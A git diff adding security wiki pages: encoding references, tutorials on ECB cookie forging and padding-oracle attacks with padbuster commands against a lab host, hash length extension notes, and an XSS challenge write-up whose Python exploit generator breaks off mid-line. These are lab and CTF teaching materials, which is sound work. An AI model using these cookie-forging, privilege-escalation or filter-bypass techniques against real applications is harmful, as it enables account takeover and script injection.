\[_123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz_\] + * `2yJiRg5BF9gmsU6AC` +* **Base62** \[_0-9A-Za-z_\] + * `g2AextRZpBKRBzQ9` +* **Base64** \[_A-Za-z0-9+/=_\] + * `aG9sYWNhcmFjb2xh` +* **Base85 --> Like Ascii85** +* **ATOM-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_\] + * `MIc3KiXa+Ihz+lrXMIc3KbCC` +* **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_\] + * `DmPsv8J7qrlKEoY7` +* **MEGAN35** \[_3GHIJKLMNOPQRSTUb=cdefghijklmnopWXYZ/12+406789VaqrstuvwxyzABCDEF5_\] + * `kLD8iwKsigSalLJ5` +* **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_\] + * `ayRiIo1gpO+uUc7g` +* **ESAB46** \[\] + * `3sHcL2NR8WrT7mhR` +* **MEGAN45** \[\] + * `kLD8igSXm2KZlwrX` +* **TIGO3FX** \[\] + * `7AP9mIzdmltYmIP9mWXX` +* **TRIPO5** \[\] + * `UE9vSbnBW6psVzxB` +* **FERON74** \[\] + * `PbGkNudxCzaKBm0x` +* **GILA7** \[\] + * `D+nkv8C1qIKMErY1` +* **Citrix CTX1** \[\] + * `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK` + +[http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng_atom128c.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) + +### HackerizeXS \[_╫Λ↻├☰┏_\] + +```text +╫☐↑Λ↻Λ┏Λ↻☐↑Λ +``` + +* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) + +### Morse + +```text +.... --- .-.. -.-. .- .-. .- -.-. --- .-.. .- +``` + +* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html) - 404 Dead: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) + +### UUencoder + +```text +begin 644 webutils_pl +M2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%( +M3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/ +F3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$$` +` +end +``` + +* [http://www.webutils.pl/index.php?idx=uu](http://www.webutils.pl/index.php?idx=uu) + +### XXEncoder + +```text +begin 644 webutils_pl +hG2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236 +5Hol-G2xAEE++ +end +``` + +* [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx) + +### YEncoder + +```text +=ybegin line=128 size=28 name=webutils_pl +ryvkryvkryvkryvkryvkryvkryvk +=yend size=28 crc32=35834c86 +``` + +* [http://www.webutils.pl/index.php?idx=yenc](http://www.webutils.pl/index.php?idx=yenc) + +### BinHex + +```text +(This file must be converted with BinHex 4.0) +:#hGPBR9dD@acAh"X!$mr2cmr2cmr!!!!!!!8!!!!!-ka5%p-38K26%&)6da"5%p +-38K26%'d9J!!: +``` + +* [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex) + +### ASCII85 + +```text +<~85DoF85DoF85DoF85DoF85DoF85DoF~> +``` + +* [http://www.webutils.pl/index.php?idx=ascii85](http://www.webutils.pl/index.php?idx=ascii85) + +### Dvorak keyboard + +```text +drnajapajrna +``` + +* [https://www.geocachingtoolbox.com/index.php?lang=en&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=en&page=dvorakKeyboard) + +### A1Z26 + +Letters to their numerical value + +```text +8 15 12 1 3 1 18 1 3 15 12 1 +``` + +### Affine Cipher Encode + +Letter to num `(ax+b)%26` \(_a_ and _b_ are the keys and _x_ is the letter\) and the result back to letter + +```text +krodfdudfrod +``` + +### SMS Code + +**Multitap** [replaces a letter](https://www.dcode.fr/word-letter-change) by repeated digits defined by the corresponding key code on a mobile [phone keypad](https://www.dcode.fr/phone-keypad-cipher) \(This mode is used when writing SMS\). +For example: 2=A, 22=B, 222=C, 3=D... +You can identify this code because you will see **several numbers repeated**. + +You can decode this code in: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher) + +### Bacon Code + +Substitude each letter for 4 As or Bs \(or 1s and 0s\) + +```text +00111 01101 01010 00000 00010 00000 10000 00000 00010 01101 01010 00000 +AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA +``` + +### Runes + +![](../.gitbook/assets/runes.jpg) + +## Compression + +**Raw Deflate** and **Raw Inflate** \(you can find both in Cyberchef\) can compress and decompress data without headers. + +## Easy Crypto + +### XOR - Autosolver + +* [https://wiremask.eu/tools/xor-cracker/](https://wiremask.eu/tools/xor-cracker/) + +### Bifid + +A keywork is needed + +```text +fgaargaamnlunesuneoa +``` + +### Vigenere + +A keywork is needed + +```text +wodsyoidrods +``` + +* [https://www.guballa.de/vigenere-solver](https://www.guballa.de/vigenere-solver) +* [https://www.dcode.fr/vigenere-cipher](https://www.dcode.fr/vigenere-cipher) +* [https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx](https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx) + +## Strong Crypto + +### Fernet + +2 base64 strings \(token and key\) + +```text +Token: +gAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmCv_fS3_VpjL7HxCz7_Q== + +Key: +-s6eI5hyNh8liH7Gq0urPC-vzPgNnxauKvRO4g03oYI= +``` + +* [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode) + +### Samir Secret Sharing + +A secret is splitted in X parts and to recover it you need Y parts \(_Y <=X_\). + +```text +8019f8fa5879aa3e07858d08308dc1a8b45 +80223035713295bddf0b0bd1b10a5340b89 +803bc8cf294b3f83d88e86d9818792e80cd +``` + +[http://christian.gen.co/secrets/](http://christian.gen.co/secrets/) + +### OpenSSL brute-force + +* [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl) +* [https://github.com/carlospolop/easy\_BFopensslCTF](https://github.com/carlospolop/easy_BFopensslCTF) + +## Tools + +* [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) +* [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom) +* [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster) + diff --git a/cryptography/electronic-code-book-ecb.md b/cryptography/electronic-code-book-ecb.md new file mode 100644 index 00000000000..aa6a1a92147 --- /dev/null +++ b/cryptography/electronic-code-book-ecb.md @@ -0,0 +1,226 @@ +--- +description: 'https://pentesterlab.com/' +--- + +# Electronic Code Book \(ECB\) + +**Post from:** [**https://pentesterlab.com/**](https://pentesterlab.com/)\*\*\*\* + +## ECB + +ECB is an encryption mode in which the message is splitted into blocks of X bytes length and each block is encrypted separetely using a key. + +The following schema \(source: [Wikipedia](http://en.wikipedia.org/wiki/Block_cipher_mode_of_operation)\) explains this method: + +![License](https://assets.pentesterlab.com/ecb/ECB_encryption.png) + +You can check the [recent XKCD on the Adobe's password leak](http://xkcd.com/1286/) to get an humoristic idea of the problems tied to ECB. + +During the decryption, the reverse operation is used. Using ECB has multiple security implications: + +* Blocks from encrypted message can be removed without disturbing the decryption process. +* Blocks from encrypted message can be moved around without disturbing the decryption process. + +In this exercise, we will see how we can exploit these two weaknesses. + +## Detection of the vulnerability + +In this exercise, you can register an account and log in with this account \(to make things easier, you get automatically logged in when you register\). + +If you create an account and log in two times with this account, you can see that the cookie sent by the application didn't change.If you log in many times and always get the same cookie, there is probably something wrong in the application. The cookie sent back should be unique each time you log in. If the cookie is always the same, it will probably always be valid and there won't be anyway to invalidate it. + +If we look at the cookie, we can see that it seems uri-encoded and base64-encoded: + +![License](https://assets.pentesterlab.com/ecb/cookie.png) + +The 2 equals sign encoded as `%3d%3d` are a good indicator of base64-encoded string. + +We can decode it using the following ruby code: + +```text +% irb +> require 'base64' ; require 'uri' + => true +> Base64.decode64(URI.decode("OR9hcp18%2BC1bChK10NlRRg%3d%3d")) + => "9\x1Far\x9D|\xF8-[\n\x12\xB5\xD0\xD9QF" +``` + +Or by decoding the URI to a string manually and use the base64 command: + +```text +% echo "OR9hcp18+C1bChK10NlRRg==" | base64 -D | hexdump -C +0000000 39 1f 61 72 9d 7c f8 2d 5b 0a 12 b5 d0 d9 51 46 |9.ar.|.-[.....QF| +0000010 +``` + +On osX, the command `base64 -D` replaces `base64 -d` + +In both cases, we can see that the information seems to be encrypted. + +First, we can start by creating two accounts `test1` and `test2` with the same password: `password` and compare the cookies sent by the application. We get the following cookies \(after URI-decoding\): + +| Account: | test1 | test2 | +| :--- | :--- | :--- | +| Cookie: | vHMQ+Nq9C3MHT8ZkGeMr4w== | Mh+JMH1OMhcHT8ZkGeMr4w== | + +If we base64-decode both cookies, we get the following strings: + +| Account: | test1 | test2 | +| :--- | :--- | :--- | +| Decoded cookie: | \xBCs\x10\xF8\xDA\xBD\vs**\aO\xC6d\x19\xE3+\xE3** | 2\x1F\x890}N2\x17**\aO\xC6d\x19\xE3+\xE3** | + +We can see that part of the decrypted values look really similar. + +Now we can try to create a user with an arbitrary long username and password. For example, a username composed of 20 `a` and a password composed of 20 `a`. By creating this user, we get the following cookie: + +```text +> document.cookie +"auth=GkzSM2vKHdcaTNIza8od1wS28inRHiC2GkzSM2vKHdcaTNIza8od1ys96EXmirn5" +``` + +If we decode this value, we get the following value: + +```text +\x1AL\xD23k\xCA\x1D\xD7\x1AL\xD23k\xCA\x1D\xD7\x04\xB6\xF2)\xD1\x1E \xB6\x1AL\xD23k\xCA\x1D\xD7\x1AL\xD23k\xCA\x1D\xD7+=\xE8E\xE6\x8A\xB9\xF9 +``` + +We can see that the following pattern \(composed of 8 bytes\): **`\x1AL\xD23k\xCA\x1D\xD7`** comes back multiple times: + +```text +\x1AL\xD23k\xCA\x1D\xD7\x1AL\xD23k\xCA\x1D\xD7\x04\xB6\xF2)\xD1\x1E \xB6\x1AL\xD23k\xCA\x1D\xD7\x1AL\xD23k\xCA\x1D\xD7+=\xE8E\xE6\x8A\xB9\xF9 +``` + +Based on the size of the pattern, we can infer that the ECB encryption uses a block size of 8 bytes.This example is using a weak encryption mechanism and it's likely that real life examples will use bigger block size. + +The decoded information also shows us that the username and password are not directly concatenated and that a delimiter is added \(since one of the block in the middle is different from the previous one\). + +We can think of the encrypted stream has one of the two following possibilities: + +* The stream contains the username, a delimiter and the password: + +![Schema username password](https://assets.pentesterlab.com/ecb/del_u_p.png) + +* The stream contains the password, a delimiter and the username: + +![Schema password username](https://assets.pentesterlab.com/ecb/del_p_u.png) + +By creating another user with a long username and a short password, we can see that the following pattern is used: `username|delimiter|password`. + +Now let's try to find the size of the delimiter, if we play with different size of username and password we get the following results: + +| Username length: | Password length: | Username+Password length: | Cookie's length \(after decoding\): | +| :--- | :--- | :--- | :--- | +| 2 | 3 | 5 | 8 | +| 3 | 3 | 6 | 8 | +| 3 | 4 | 7 | 8 | +| 4 | 4 | 8 | 16 | +| 4 | 5 | 9 | 16 | + +We can see that the size of the decoded cookie goes from 8 to 16 bytes when the length of the Username+Password is greater than 7. We can infer from this value that the delimiter is a single byte since the encryption is done per block of 8 bytes. + +Another important thing is to see what part of the encrypted stream is used by the application when we send the cookie back. If we remove everything after the block corresponding to the delimiter, we can see that we are still authenticated. The password does not seem to be used when the cookie gets used by the application. + +We now know that we just need to get the correct `username|delimiter` to get authenticated within the application as `username`.If you can find what delimiter is used \(or brute force it\), you can try to create a user with a username that contains the delimiter \(for example the username "`admin:`"\). Using this method, you may be able to get logged in as `admin`. This web application prevents this type of attack. + +## Exploitation of the vulnerability + +### By removing information + +The easiest way to get `admin` access is to remove some of the encrypted data. We know that the application uses the following format: + +```text +\[username\]:\[separator\] +``` + +and only uses the `username` when the cookie is sent back to the application. We also know that each block of 8 bytes is completely independant \(ECB\). To exploit this issue, we can create a username that contains 8 characters followed by the word `admin`: + +```text +aaaaaaaaadmin +``` + +And we will receive the cookie \(retrieved using the Javascript Console\): + +```text +> document.cookie +"auth=GkzSM2vKHdfgVmQuKXLregdPxmQZ4yvj" +``` + +This value will get decoded as: + +```text +\x1AL\xD23k\xCA\x1D\xD7\xE0Vd.)r\xEBz\aO\xC6d\x19\xE3+\xE3 +``` + +We can see the pattern `\x1AL\xD23k\xCA\x1D\xD7` detected previously with the username that contained 20 `a`. + +We can then remove the first 8 bytes of information and reencode our payload to get a new cookie: + +```text +\xE0Vd.)r\xEBz\aO\xC6d\x19\xE3+\xE3 +``` + +That will get encoded by the following ruby code: + +```text +% irb +> require 'cgi'; require 'base64' + => true +> CGI.escape(Base64.strict_encode64("\xE0Vd.)r\xEBz\aO\xC6d\x19\xE3+\xE3")) + => "4FZkLily63oHT8ZkGeMr4w%3D%3D" +``` + +Once you modify the cookie: + +![Cookie tampering with JS console](https://assets.pentesterlab.com/ecb/cookiemod.png) + +And send this value back to the application \(by reloading the page\), you get logged in as `admin`: + +![License](https://assets.pentesterlab.com/ecb/admin.png) + +### By swapping blocks around + +A more complicated way to bypass this is to swap data around. We can make the assumption that the application will use an SQL query to retrieve information from the user based on his `username`. For some databases, when using the type of data `VARCHAR` \(as opposed to `BINARY` for example\), the following will give the same result: + +```text +SELECT * FROM users WHERE username='admin'; +``` + +```text +SELECT * FROM users WHERE username='admin '; +``` + +The spaces after the value `admin` are ignored during the string comparison. We will use this to play with the encrypted blocks. + +Our goal is to end up with the following encrypted data: + +```text +ECB(admin [separator]password) +``` + +We know that our separator is only composed of one byte. We can use this information to create the perfect `username` and `password`to be able to swap the blocks and get the correct forged value. + +We need to find a username and a password for which: + +* the password starts with `admin` to be used as the new username. +* the encrypted password should be located at the start of a new block. +* the `username+delimiter` length should be divisible by the block size \(from previous conditions\) + +By playing around, we can see that the following values work: + +* a `username` composed of `password` \(8 bytes\) followed by 7 spaces \(1 byte will be used by the delimiter\). +* a `password` composed of `admin` followed by 3 spaces \(`8 - length("admin")`\). + +When creating this user, use a proxy to intercept the request and make sure your browser didn't remove the space characters. + +If you create correctly this user, the encrypted information will look like:![License](https://assets.pentesterlab.com/ecb/swap-b.png) + +Using some Ruby \(or even with Burp decoder\), you can swap the first 8 bytes with the last 8 bytes to get the following encrypted stream:![License](https://assets.pentesterlab.com/ecb/swap-a.png) + +Once you modify your cookie, and you reload the page, you should be logged in as `admin`: + +![License](https://assets.pentesterlab.com/ecb/admin.png) + +## Conclusion + +This exercise showed you how you can tamper encrypted information without decrypting them and use this behaviour to gain access to other accounts. It showed you that encryption can not be used as a replacement to signature and how it's possible to use ECB encryption to get control on the decrypted information. I hope you enjoyed learning with PentesterLab. + diff --git a/cryptography/hash-length-extension-attack.md b/cryptography/hash-length-extension-attack.md new file mode 100644 index 00000000000..6dbcbcc0696 --- /dev/null +++ b/cryptography/hash-length-extension-attack.md @@ -0,0 +1,35 @@ +# Hash Length Extension Attack + +## Summary of the attack + +Imagine a server which is **signing** some **data** by **appending** a **secret** to some known clear text data and then hashing that data. If you know: + +* **The length of the secret** \(this can be also bruteforced from a given length range\) +* **The clear text data** +* **The algorithm \(and it's vulnerable to this attack\)** +* **The padding is known** + * Usually a default one is used, so if the other 3 requirements are met, this also is + * The padding vary depending on the length of the secret+data, that's why the length of the secret is needed + +Then, it's possible for an **attacker** to **append** **data** and **generate** a valid **signature** for the **previos data + appended data**. + +### How? + +Basically the vulnerable algorithms generate the hashes by firstly **hashing a block of data**, and then, **from** the **previously** created **hash** \(state\), they **add the next block of data** and **hash it**. + +Then, imagine that the secret is "secret" and the data is "data", the MD5 of "secretdata" is 6036708eba0d11f6ef52ad44e8b74d5b. +If an attacker wants to append the string "append" he can: + +* Generate a MD5 of 64 "A"s +* Change the state of the previously initialized hash to 6036708eba0d11f6ef52ad44e8b74d5b +* Append the string "append" +* Finish the hash and the resulting hash will be a **valid one for "secret" + "data" + "padding" + "append"** + +### **Tool** + +{% embed url="https://github.com/iagox86/hash\_extender" %} + +## References + +You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) + diff --git a/cryptography/padding-oracle-priv.md b/cryptography/padding-oracle-priv.md new file mode 100644 index 00000000000..1a1100ce546 --- /dev/null +++ b/cryptography/padding-oracle-priv.md @@ -0,0 +1,125 @@ +--- +description: 'https://pentesterlab.com/' +--- + +# Padding Oracle + +**Post from** [**https://pentesterlab.com/**](https://pentesterlab.com/)\*\*\*\* + +## Cipher Block Chaining + +CBC is an encryption mode in which the message is split into blocks of X bytes length and each block is XORed with the previous encrypted block. The result is then encrypted. + +The following schema \(source: [Wikipedia](http://en.wikipedia.org/wiki/Block_cipher_mode_of_operation)\) explains this method: + +![CBC encryption](https://assets.pentesterlab.com/padding_oracle/CBC_encryption.png) + +During the decryption, the reverse operation is used. The encrypted data is split in block of X bytes. Then the block is decrypted and XORed with the previous encrypted block to get the cleartext. The following schema \(source: [Wikipedia](http://en.wikipedia.org/wiki/Block_cipher_mode_of_operation)\) highlights this behavior: + +![CBC decryption](https://assets.pentesterlab.com/padding_oracle/CBC_decryption.png) + +Since the first block does not have a previous block, an initialization vector \(IV\) is used. + +## Padding + +As we saw, the encryption is done by blocks of fixed size. To ensure that the cleartext exactly fit in one or multiple blocks, padding is often used. Padding can be done in multiple ways. A common way is to use PKCS7. With PKCS7, the padding will be composed of the same number: the number of bytes missing. For example, if the cleartext is missing 2 bytes, the padding will be `\x02\x02`. + +Let's look at more examples with a 2 blocks: + +| Block \#0 | Block \#1 | | | | | | | | | | | | | | | +| :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | +| byte \#0 | byte \#1 | byte \#2 | byte \#3 | byte \#4 | byte \#5 | byte \#6 | byte \#7 | byte \#0 | byte \#1 | byte \#2 | byte \#3 | byte \#4 | byte \#5 | byte \#6 | byte \#7 | +| 'S' | 'U' | 'P' | 'E' | 'R' | 'S' | 'E' | 'C' | 'R' | 'E' | 'T' | '1' | '2' | '3' | **0x02** | **0x02** | +| 'S' | 'U' | 'P' | 'E' | 'R' | 'S' | 'E' | 'C' | 'R' | 'E' | 'T' | '1' | '2' | **0x03** | **0x03** | **0x03** | +| 'S' | 'U' | 'P' | 'E' | 'R' | 'S' | 'E' | 'C' | 'R' | 'E' | 'T' | **0x05** | **0x05** | **0x05** | **0x05** | **0x05** | +| 'S' | 'U' | 'P' | 'E' | 'R' | 'S' | 'E' | 'C' | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | + +## Padding Oracle + +When an application decrypts encrypted data, it will first decrypt the data; then it will remove the padding. During the cleanup of the padding, **if** an **invalid** **padding** triggers a detectable **behaviour**, you have a **padding oracle vulnerability**. The detectable behaviour can be an **error**, a **lack** of **results**, or a **slower response**. + +If you detect this behaviour, you can **decrypt the encrypted data** and even **encrypt any cleartext**. + +### How to exploit + +You could use [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) to exploit this kind of vulnerability or just do + +```text +sudo apt-get install padbuster +``` + +In order to test if the cookie of a site is vulnerable you could try: + +```bash +perl ./padBuster.pl http://10.10.181.45/index.php "Nl0OpaQYeGPMJeWSih2iiQ==" 8 -encoding 0 -cookies "auth=Nl0OpaQYeGPMJeWSih2iiQ==" +``` + +**Encoding 0** means that **base64** is used \(but others are available, check the help menu\). + +You could also **abuse** this **vulnerability** to **encrypt new data**. For example, imagine that the content of the cookie is "_user=MyUsername_", then you may change it to "_**user=administrator**_" and escalate privileges inside the application. You could also do it using `paduster`specifying the **-plaintext** parameter: + +```bash +perl ./padBuster.pl http://10.10.181.45/index.php "Nl0OpaQYeGPMJeWSih2iiQ==" 8 -encoding 0 -cookies "auth=Nl0OpaQYeGPMJeWSih2iiQ==" -plaintext "user=administrator" +``` + +If the site is vulnerable `padbuster`will automatically try to find when the padding error occurs, but you can also indicating the error message it using the **-error** parameter. + +```bash +perl ./padBuster.pl http://10.10.181.45/index.php "Nl0OpaQYeGPMJeWSih2iiQ==" 8 -encoding 0 -cookies "hcon=Nl0OpaQYeGPMJeWSih2iiQ==" -error "Invalid padding" +``` + +### The theory + +In **summary**, you can start decrypting the encrypted data by **guessing** the correct **values** that can be used to **create** all the **different paddings**. Then, the padding oracle attack will start **decrypting** bytes **from** the **end** to the start by **guessing** which will be the correct **value** that **creates a padding of 1, 2, 3, etc**. + +If we zoom in, we can see that the cleartext byte `C15` is just a XOR between the encrypted byte `E7` from the previous block, and byte `I15` which came out of the block decryption step: + +![CBC zoom in](https://assets.pentesterlab.com/padding_oracle/zoomin.png) + +This is also valid for all other bytes: + +* `C14 = I14 ^ E6` +* `C13 = I13 ^ E5` +* `C12 = I12 ^ E4` +* ... + +Now if we modify `E7` and keep changing its value, we will keep getting an invalid padding. Since we need `C15` to be `\x01`. However, there is one value of `E7` that will give us a valid padding. Let's call it `E'7`. With `E'7`, we get a valid padding. And since we know we get a valid padding we know that `C'15` \(as in `C15` for `E'7`\) is `\x01`. + +`\x01 = I15 ^ E'7` + +The gives us: + +`I15 = \x01 ^ E'7` + +So we are able to compute `I15`. + +Since we know `I15`, we can now compute `C15` + +`C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7` + +Now that we have `C15`, we can move to brute-forcing `C14`. First we need to compute another `E7` \(let's call it `E''7`\) that gives us `C15 = \x02`. We need to do that since we want the padding to be `\x02\x02` now. It's really simple to compute using the property above and by replacing the value of `C15` we want \(`\x02`\) and `I15` we now know: + +`E''7 = \x02 ^ I15` + +After brute force `E6`, to find the value that gives us a valid padding `E''6`, we can re-use the formula: + +`C14 = I14 ^ E6` + +to get + +`I14 = \x02 ^ E''6` + +Once we get `I14`, we can compute `C14`: + +`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6` + +Using this method, we can keep going until we get all the ciphertext decrypted. + +### Detection of the vulnerability + +To get started, you can register an account and log in with this account \(to make things easier, you get automatically logged in when you register\). + +If you create an account and log in two times with this account, you can see that the cookie sent by the application didn't change.If you log in many times and always get the same cookie, there is probably something wrong in the application. The cookie sent back should be unique each time you log in. If the cookie is always the same, it will probably always be valid and there won't be anyway to invalidate it. + +Now, if you try to modify the cookie, you can see that you get an error from the application. + diff --git a/cryptography/rc4-encrypt-and-decrypt.md b/cryptography/rc4-encrypt-and-decrypt.md new file mode 100644 index 00000000000..12991b9aeda --- /dev/null +++ b/cryptography/rc4-encrypt-and-decrypt.md @@ -0,0 +1,14 @@ +# RC4 - Encrypt&Decrypt + +If you can somehow encrypt a plaintext using a RC4**,** you can decrypt any content encrypted by that RC4\(using the same password\) just using the encryption function. + +If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine: + +{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} + +{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} + +\*\*\*\* + + + diff --git a/ctf-write-ups/README.md b/ctf-write-ups/README.md new file mode 100644 index 00000000000..7328e9213f3 --- /dev/null +++ b/ctf-write-ups/README.md @@ -0,0 +1,5 @@ +# CTF Write-ups + +* [Write-up factory](https://writeup.raw.pm/) - Seach engine to find write-ups \(TryHackMe, HackTheBox, etc.\) +* [CTFtime Write-ups](https://ctftime.org/writeups) - Newest write-ups added to CTF events on CTFtime + diff --git a/ctf-write-ups/challenge-0521.intigriti.io.md b/ctf-write-ups/challenge-0521.intigriti.io.md new file mode 100644 index 00000000000..54346279bf1 --- /dev/null +++ b/ctf-write-ups/challenge-0521.intigriti.io.md @@ -0,0 +1,176 @@ +# challenge-0521.intigriti.io + +### Brief Description + +The challenge provides a vulnerable to XSS form in the page [https://challenge-0521.intigriti.io/captcha.php](https://challenge-0521.intigriti.io/captcha.php). +This form is loaded in [https://challenge-0521.intigriti.io/](https://challenge-0521.intigriti.io/) via an iframe. + +It was found that the form will **insert the user input inside the JavaScript `eval` function**. This is usually a bad idea as it can lead to **arbitrary JavaScript execution**, and this is a good example. +However, before inserting the user input inside the`eval` function, it’s checked with the regexp `/[a-df-z<>()!\\='"]/gi` so if any of those character is found, the user input won’t be executed inside `eval`. +Anyway, it was found a way to bypass the regexp protection and execute `alert(document.domain)` abusing the dangerous `eval` function. + +### Accessing the HTML + +It was found that the letter `e` is permitted as user input. It was also found that there is an HTLM element using the `id="e"`. Therefore, this HtML element is accesible from Javascript just using the variable `e`: +![](https://i.imgur.com/Slq2Xal.png) + +Also, it’s important to know that in JS you can **access the attributes of an objects with a dot or with a string between brackets**. So, you can access the `domain` attribute of a `document` object in either of the following ways: + +```javascript +document.domain +document["domain"] +``` + +And the same happens with attributes that are functions \(methods\): + +```javascript +document.write("1") +document["write"]("1") +``` + +Then, from the `e` HTML element it’s possible to access the `document` object using something like: + +```javascript +e["parentNode"]["parentNode"]["parentNode"]["parentNode"]["parentNode"] +``` + +### Calling a function without parenthesis with JS code as string + +From the object `document` it’s possible to call the `write` function to **write arbitrary HTML text that the browser will execute**. +However, as the `()` characters are **forbidden**, it’s not possible to call the function using them. Anyway, it’s possible to call a function using **backtips** \(\`\`\). +Moreover, it’s possible to put as string javascript code that is going to be executed using `${...}` like: + +```javascript +`${"alert(document.location)"}` +``` + +Therefore, combining the `document` object access with this technique to execute functions without parenthesis it’s possible to **execute an alert using**: + +```javascript +e["parentNode"]["parentNode"]["parentNode"]["parentNode"]["parentNode"]["write"]`${""}` +``` + +You can test this code in a javascript console inside the page [https://challenge-0521.intigriti.io/captcha.php](https://challenge-0521.intigriti.io/captcha.php) + +### Final forbidden characters bypass + +However, there is still one problem left. Most of the characters of the exploit are **forbidden** as they appear in the regexp `/[a-df-z<>()!\\='"]/gi`. But note how all the **forbidden characters are strings** inside the exploit and the **not string characters in the exploit \(e\[\]\`${}\) are allowed**. +This means that if it’s possible to **generate the forbidden charaters as strings from the allowed characters**, it’s possible to generate the exploit. +In order to do this I have generated a [JSFuck](http://www.jsfuck.com/) like alphabet to generate the necesary characters \(_this alphabet is custom for this challenge_\). +You can **see the full alphabet inside the exploit code** \(which can be found in the next subsection and in the file _exploit.txt_\). + +For example, in order to **generate the letter `a`** it’s possible to access **`[[]/e+e][0][1]`** as `[[]/e+e][0]` generates the string `"NaN[object HTMLProgressElement]"` or in order to generate the **letter `f`** its possible to access the **5th char of `[[][[]]+e][0]`** as that expression generates the string `"undefined[object HTMLProgressElement]"`. +Using these tricks and some more complex ones it was possible to **generate all the characters \(letters and symbols\) of the strings contained** in the exploit: + +```javascript +e["parentNode"]["parentNode"]["parentNode"]["parentNode"]["parentNode"]["write"]`${""}` +``` + +### Exploit Code + +This is the python exploit used to generate the final exploit. If you execute it, it will print the exploit: + +```python + +#JS Specific Direct Alphabet +x = { + "1": "1", + ".": ".", + "[": "[e+e][0][0]", + "]": "[e+e][0][27]", + "/": "[/e/+e][0][0]", + "a": "[[]/e+e][0][1]", + "b": "[e+e][0][2]", + "c": "[e+e][0][5]", + "d": "[[][[]]+e][0][2]", + "e": "[e+e][0][4]", + "f": "[[][[]]+e][0][4]", + "g": "[e+e][0][15]", + "H": "[e+e][0][8]", + "i": "[[][[]]+e][0][5]", + "j": "[e+e][0][3]", + "L": "[e+e][0][11]", + "l": "[e+e][0][21]", + "M": "[e+e][0][10]", + "n": "[[][[]]+e][0][1]", + "N": "[[]/e+e][0][0]", + "o": "[e+e][0][1]", + "r": "[e+e][0][13]", + "s": "[e+e][0][18]", + "t": "[e+e][0][6]", + "T": "[e+e][0][9]", + "u": "[[][[]]+e][0][0]", +} + +#JS Dependent Alphabet +#The following alphabet will use previously obtained characters +#Note that this way of getting the characters are custom for the abused HTML + +outerHTML = '+'.join(x[k] for k in 'outerHTML') + +x['p'] = f'e[{outerHTML}][1]' +x['y'] = f'e[{outerHTML}][39]' +x['<'] = f'e[{outerHTML}][0]' +x['>'] = f'e[{outerHTML}][62]' +x['"'] = f'e[{outerHTML}][13]' + +parentNode = '+'.join(x[k] for k in 'parentNode') +document =f'e[{parentNode}][{parentNode}][{parentNode}][{parentNode}][{parentNode}]' + +x['h'] = f'e[{parentNode}][{parentNode}][{outerHTML}][15]' + +children = '+'.join(x[k] for k in 'children') +captcha = '+'.join(x[k] for k in 'captcha') + +x['w'] = f'e[{parentNode}][{parentNode}][{parentNode}][{children}][{captcha}][{x["g"]}][{outerHTML}][35]' +write = '+'.join(x[k] for k in 'write') + +x['m'] = 